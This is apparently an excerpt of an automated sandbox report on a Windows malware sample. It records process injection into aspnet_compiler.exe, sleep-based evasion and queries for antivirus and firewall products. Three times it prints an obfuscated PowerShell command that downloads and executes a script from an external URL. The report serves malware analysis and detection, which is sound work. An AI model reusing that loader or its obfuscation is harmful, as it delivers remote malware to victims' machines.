          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6828Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5146
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 6196
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 2970
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 631
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 767
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000001.00000002.314082630.000001C747799000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWkTW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Yara detected Powershell download and executeShow sources
          Source: Yara matchFile source: amsi64_6152.amsi.csv, type: OTHER
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 922008
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
